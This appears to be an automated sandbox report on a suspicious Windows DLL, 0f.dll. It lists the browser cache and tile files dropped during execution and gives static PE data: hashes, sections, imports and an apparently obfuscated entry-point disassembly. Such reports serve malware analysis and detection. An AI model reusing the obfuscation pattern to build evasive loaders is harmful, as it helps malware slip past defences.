File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.119905113075047
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLD8GjnWimI002EtM3MHdNMNxvLD8GjnWimI00ObmZEtMb:2d6NxvfSZHKd6NxvfSZ7mb
MD5:	2544FD05527C054C8DF3BA23EE41EC7B
SHA1:	E831E81CC7D44B0136DCDB28B43D205F7ACB2373
SHA-256:	B01039E1F635638B2F6EA1E9A71206D07523634A4F7320C9BCA1CBBAAB1EA218
SHA-512:	631A1F882E0CBC94CF2DFB723FCA701959F14C70641A7E27DD8ACA1421312DE649277C101CD74827307A18156919C29CE686C5E9721F01E017D6BA1958AD6689
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x9b566f66,0x01d7bbce</date><accdate>0x9b566f66,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x9b566f66,0x01d7bbce</date><accdate>0x9b566f66,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.123486204812417
Encrypted:	false
SSDEEP:	12:TMHdNMNxiWCnWimI002EtM3MHdNMNxiWCnWimI00Obd5EtMb:2d6NxESZHKd6NxESZ7Jjb
MD5:	E0B40BCD3C29E9C1843BBF53A62255A3
SHA1:	E4ACD05178FA797D64DBF9E4C97BF38D9995F726
SHA-256:	30E079AA2536B1FDE438410443824E67DA7996D7B788BA171191004E96666421
SHA-512:	A44146F71F634E7AF699D20EFECAD2889B3CC476B46FBAEEC762CD11C305F1013A0278A3C0770635E8E3808E4AC61D50B32C8259D5B8063788DB20A92F2A6BCA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.127001735722792
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwD8GjnWimI002EtM3MHdNMNxhGwD8GjnWimI00Ob8K075EtMb:2d6NxQmSZHKd6NxQmSZ7YKajb
MD5:	2A79317507DCC843A39E305AF8AFDE32
SHA1:	70A060E42DCFA217398616C5745D15446B2505C1
SHA-256:	AF625B0D3CDA31324047ED4ABC78F4B15C73AFA5E26082A7164196A30BEBD9DE
SHA-512:	7FCBDAD8CA0C438FC1327D8D4950B471492EFBFACCD2C2B8186CAB5AFDC7BE909CACCC7F97B6DF38B97397660848BF2AD2F6A93AE49F37D118F583123915FF67
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9b566f66,0x01d7bbce</date><accdate>0x9b566f66,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9b566f66,0x01d7bbce</date><accdate>0x9b566f66,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.110774963400463
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nWCnWimI002EtM3MHdNMNx0nWCnWimI00ObxEtMb:2d6Nx0zSZHKd6Nx0zSZ7nb
MD5:	BE0E56E5768CB1791890ED689C01B1BE
SHA1:	3A1A25EAC0B613D8EA41AD6DA0130FEBBDD2DFE4
SHA-256:	DC668F7C29E2F40537610A5D7D7FC3C77F6E6DDED2657488D35880B946703D7A
SHA-512:	982C545F3416C26C80852796D3320FCF36759EA0F32DEDA695634D6BCC4D92D3B02E9856FCE981014679A1F2F9760A7EEB64AEA0AFEE1637199C62296A0F79C4
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.147967201075354
Encrypted:	false
SSDEEP:	12:TMHdNMNxxWCnWimI002EtM3MHdNMNxxWCnWimI00Ob6Kq5EtMb:2d6NxlSZHKd6NxlSZ7ob
MD5:	F74D7428F32B2F62DE287ACC75B6D49A
SHA1:	BFA99A67ECC10AC006FAB791E7F97147458C66F4
SHA-256:	DE3EE199535C258A56FDB933EE6665804B4207B36D88EFA7ED3DCAF8449BD1B6
SHA-512:	F91DB48C540AF354BF54375F87D3B4308FF10AFA69884F607EF39217D559AF4EE10DA1DDA2746B3C2FE7A42F8616DC8D4501A8475D52F3BE04034DA3CABF99F3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.134325724897167
Encrypted:	false
SSDEEP:	12:TMHdNMNxcL8ijnWimI002EtM3MHdNMNxcL8ijnWimI00ObVEtMb:2d6NxuzjSZHKd6NxuzjSZ7Db
MD5:	0B59888F018D85C6AF868C51B39B0603
SHA1:	3F61342FFB6A4D827187B09D6E013CB480889FAA
SHA-256:	0008F44CA9738270DFFF72E1FF1ED004C5DDE062A4A430E94CEF86F8F2F72DB2
SHA-512:	940277E01D5EE301866E29AC126EA88A2AEF94604AA612C6882D3052255C23A61239BB074D9E516A8B4B382BB029FABAFFDAA2863804EE0258DA364C2810C5AA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.123476990133076
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnL8ijnWimI002EtM3MHdNMNxfnL8CnWimI00Obe5EtMb:2d6NxTzjSZHKd6NxTJSZ7ijb
MD5:	C0CECA743047E53995B308329C42B758
SHA1:	80F5FA1AB8CF709D2DEA1DDE221C9F5AB9656F0C
SHA-256:	B1BB9FE8C5741A24D45511004CEA2B082CA438DB2B8028777E6A640E86313A0F
SHA-512:	DBD1F04B3E3D5240AD9E07FD632C7EC1A57412A852932D605722F80632041CF647CE05A5BFB4F579B53279C00CA0B36CDBA2C41B89B9840F4D1F3519B48F556B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.39783508257439
Encrypted:	false
SSDEEP:	3:oVXUYzKQTfFphW8JOGXnEYzKQTfFpbLun:o9UYzKQTX0qEYzKQTXbC
MD5:	96CE80CB02C302A441DE74AF8A06EED5
SHA1:	3AC02A600B79AF8ABAFD5C57CC1A996915FC21FC
SHA-256:	48026BED77C076952F9F5AC2FAC05B4840EBABC3D4F26E23424CF27ED1E9D87C
SHA-512:	75B05A3627467E68DA9FF10CF9C8F923E4E77F99629C99674B5991C7ED040866A018F92E053CA047ECDD17ECCCE836BBB37E79AFBE5671CB5D6B65DFB2FB4F9B
Malicious:	false
Preview:	[2021/10/07 15:56:16.503] Latest deploy version: ..[2021/10/07 15:56:16.503] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DFA1D11EC49A94A948.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40121
Entropy (8bit):	0.6662066462562781
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+AGcdGLRh8CVZRh8CVaRh8CVP:N8G8B8W
MD5:	A10F00C96C90A98D5AD726F315D7E8EC
SHA1:	DDC4214284F24081022316EAB9A06F30D7F20A33
SHA-256:	5CD7342F83768F33EC03EED2017C885D7AF4D2C88F569514BAA896D409935B37
SHA-512:	1DB71E92C872F324D337B5DEA3D7D1C106AB59000B98E55C0D1EC3C3B4FA3DD326E666B5CF553ED63829908DA8FB80BF3F1AC78BF249CCF60A5BF16CCA4E5B81
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCB4F6EF3903B6C34.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4079157710343825
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lol4YF9lol4g9lWl4P4Dh43Q4w4Dh4304M4x:kBqoIqrqNqwC33XC3DLx
MD5:	C93DA6F6188C47D44D61BA6CE2A636FE
SHA1:	A88F5F64B15D7C3D192BEA14E7273C0B82F48F74
SHA-256:	96CB17E675B019E40C198AA6F29DDF5BA747FA6F36916D120E963A61B48D675F
SHA-512:	3CF67AEDC23A7CD9710DF6DDAFE8FBBE99FAC8C9BE336B30588BFD1AB529F509BB3AB1F0518EFE16BC5B2E97B24F5E9258517B3215EFD28DA7ADE4DA7A1CEEBE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	2.5822820478796022
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0f.dll
File size:	397824
MD5:	0f90b21a2cdc35511626509c67c8cbf5
SHA1:	1293aa454365b3679afd77b34749ce8e175c997a
SHA256:	95dbbfc33223e8e670b4f25d086d65a41d67f0434d3fe37469a7bd23e134f1f6
SHA512:	0c46cceb3e716e995eb043e8f59b0883406954e6628602969a5c8c53088e018e2ae49f27942ee44aef0553d772c0fc33f33d974ce720dce8396ae85c89a11d3e
SSDEEP:	3072:/NCW8aQutBgN/+bz37UGw+24RwFBatjKqe0FucS:/1oig+TRwTYKqe
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^7...Vl..Vl..Vl..I...Vl..v~..Vl.Rich.Vl.................PE..L.....m`...........!...............................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1000810a
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x606D96B2 [Wed Apr 7 11:25:38 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6a47c078cd001e32ce158eef785cbcae

Entrypoint Preview

Instruction
push FFFFFFFFh
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push ebp
mov dword ptr [esp], FFFF0000h
call 00007F01ECBDD1BCh
call dword ptr [ebx+00A901B4h]
cmp ebx, 00000000h
jbe 00007F01ECBE06C7h
push eax
add dword ptr [esp], 00000247h
sub dword ptr [esp], eax
push esi
add dword ptr [esp], 00000567h
sub dword ptr [esp], esi
call 00007F01ECBD9837h
push ebp
mov ebp, eax
or ebp, eax
mov eax, ebp
pop ebp
jne 00007F01ECBE069Eh
and dword ptr [ebp-0Ch], 00000000h
push dword ptr [ebp-0Ch]
add dword ptr [esp], eax
push esi
sub dword ptr [esp], esi
or dword ptr [esp], ecx
push ebp
sub dword ptr [esp], ebp
or dword ptr [esp], edx
lea eax, dword ptr [ebx+0041C7ECh]
and dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
or dword ptr [esp], eax
call dword ptr [ebx+00A90128h]
mov dword ptr [ebp-04h], esi
sub esi, dword ptr [ebp-04h]
or esi, eax
and dword ptr [ebx+0041D5A2h], 00000000h
xor dword ptr [ebx+0041D5A2h], esi
mov esi, dword ptr [ebp-04h]
pop edx
pop ecx
pop eax
cmp dword ptr [ebx+0041D8D3h], 00000000h
jne 00007F01ECBDF9B7h
cmp dword ptr [ebx+0041D2F5h], 00000000h
jne 00007F01ECBDF816h
push dword ptr [ebp-08h]
mov dword ptr [esp], eax
and dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
or dword ptr [esp], ecx
mov dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
xor dword ptr [eax+eax], edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1b000	0x49	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x690224	0xa0	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x690000	0x224	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x19e78	0x1a000	False	0.617760291466	data	6.43604242524	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x49	0x200	False	0.1328125	data	0.802850919454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x673a50	0x45c00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x690000	0xe70	0x1000	False	0.395751953125	data	4.74218170739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
user32.dll	GetCapture, ShowWindow, SetWindowPos, ShowCursor, GetCursorInfo, SetCursor, SetFocus, GetCaretBlinkTime, IMPQueryIMEW, SetWindowsHookW, CopyAcceleratorTableW, BringWindowToTop, CheckDlgButton, GetDlgItemTextA, SetMessageExtraInfo, IsCharUpperW, GetWindowThreadProcessId, SetInternalWindowPos, GetMonitorInfoW, MessageBoxIndirectW, InvalidateRgn, ChangeMenuW, SetWinEventHook, OpenIcon, UnhookWinEvent, DragDetect, RemovePropW
kernel32.dll	GetTickCount, VirtualProtect, GetLastError, GetProcAddress, LoadLibraryA, VirtualAlloc, lstrlenA, lstrcatA, lstrcmpA, SetLastError, GetProcessId, GetConsoleCP, GetACP, CreateProcessW, VerLanguageNameW, BackupWrite, FlushFileBuffers, DebugActiveProcessStop, EnumerateLocalComputerNamesW, DuplicateHandle, GetShortPathNameW, GetDateFormatA
imagehlp.dll	BindImage, EnumerateLoadedModules, SymGetModuleInfo64, ImagehlpApiVersionEx, ImageNtHeader, SymFromName, SymGetSymPrev64, SymMatchString, SymSetOptions, SymEnumerateSymbols, SymEnumTypes, SymEnumerateSymbols64, SymGetLineFromName64, SymLoadModule64
oleaut32.dll	VarI4FromI1, DosDateTimeToVariantTime, VarUI1FromDisp, SetOaNoCache, VarR4FromUI8, SafeArrayGetDim, VarDecNeg, VarI1FromDec, VarUI2FromI2, VarDecFromStr, VarUI4FromStr, VarUI4FromUI2, VarUI4FromI8, VARIANT_UserMarshal, VarBstrCat, VarAbs, VarCyFromUI8
gdi32.dll	EqualRgn, GetCharWidthW, BRUSHOBJ_pvAllocRbrush, GetPixelFormat, DdEntry33, GetArcDirection, LineTo, ColorCorrectPalette, GetBkMode, SetArcDirection, GetBitmapAttributes
comdlg32.dll	WantArrows, GetFileTitleW, FindTextW, CommDlgExtendedError, ChooseColorA, dwOKSubclass, dwLBSubclass, GetOpenFileNameA, PrintDlgExA, ChooseFontA, GetFileTitleA
